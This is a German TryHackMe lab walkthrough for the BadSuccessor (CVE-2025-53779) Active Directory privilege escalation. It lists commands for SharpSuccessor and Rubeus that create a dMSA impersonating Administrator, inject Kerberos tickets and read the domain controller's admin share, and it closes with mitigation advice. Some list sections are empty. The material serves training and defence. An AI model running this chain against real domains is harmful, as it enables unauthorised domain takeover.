
Ein TryHackme-Raum, der die Ausnutzung von CVE-2025-53779 unter Windows behandelt
In diesem Raum erkunden wir die BadSuccessor Privilegienausweitungstechnik, eine Schwachstelle, die delegierte Managed Service Accounts (dMSAs) in Active Directory missbraucht. Der Angriff erlaubt einem Benutzer mit ausreichender Kontrolle über ein dMSA-Objekt, ein anderes Konto zu impersonieren und möglicherweise Domain-Administrator-Rechte zu erlangen.
Raum: https://tryhackme.com/room/adbadsuccessor
Schwierigkeit: Mittel
Datum: 05/06/2026
Version: 1.0
Ziel: Demonstrieren, wie delegierte Managed Service Accounts missbraucht werden können, um Privilegien auszuweiten und eine Active Directory-Umgebung zu kompromittieren.
Rolle: Terry Byte (tbyte)
Zielsetzung: Bewerten der Sicherheit einer neu bereitgestellten Active Directory-Umgebung und Feststellen, ob sie für den BadSuccessor-Angriff anfällig ist.
Der Angriff besteht aus zwei Hauptphasen:
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
Wechseln Sie zum Proof-of-Concept-Verzeichnis:
cd C:\PoC
Überprüfen Sie den Inhalt: dir
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
notepad Get-BadSuccessorOUPermissions.ps1
.\Get-BadSuccessorOUPermissions.ps1
Verwenden Sie SharpSuccessor, um einen delegierten Managed Service Account zu erstellen, der das Administrator-Konto impersoniert:
.\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
Was passiert?
Verwenden Sie Rubeus, um ein delegiertes Ticket Granting Ticket (TGT) zu erhalten:
.\Rubeus.exe tgtdeleg /nowrap
Der Befehl gibt ein Base64-kodiertes Kerberos-Ticket zurück.
Kopieren Sie das generierte Ticket.
.\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Ergebnis:
Ein neues Kerberos-Ticket wird für das dMSA-Konto in den Speicher eingefügt.
Nutzen Sie das dMSA-Ticket, um Zugriff auf Dienste zu erhalten, die im Administrator-Kontext ausgeführt werden:
.\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Ergebnis:
dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
Lesen Sie die auf dem Administrator-Desktop gespeicherte Flagge:
Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
Flagge erfolgreich erbeutet.
BadSuccessor zeigt, wie delegierte Managed Service Accounts Privilegienausweitungspfade in Active Directory-Umgebungen einführen können. Active Directory dient als Identitätsgrundlage für viele Organisationen; Schwachstellen, die Kerberos und die Kontendelegation betreffen, können schwerwiegende Folgen haben.
Ein Angreifer mit ausreichenden Berechtigungen über ein dMSA-Objekt kann:
Um BadSuccessor (CVE-2025-53779) zu entschärfen, sollten Organisationen umgehend Microsofts Sicherheitsupdates anwenden, dMSA-Berechtigungen einschränken und überprüfen, verdächtige Kerberos-Aktivitäten überwachen, Delegierungsbeziehungen auditieren und das Prinzip der geringsten Privilegien durchsetzen. Regelmäßige Überprüfungen der Active Directory-Delegierungseinstellungen können helfen, potenzielle Privilegienausweitungspfade zu identifizieren und zu reduzieren.
Dieser Raum bot wertvolle praktische Erfahrungen mit: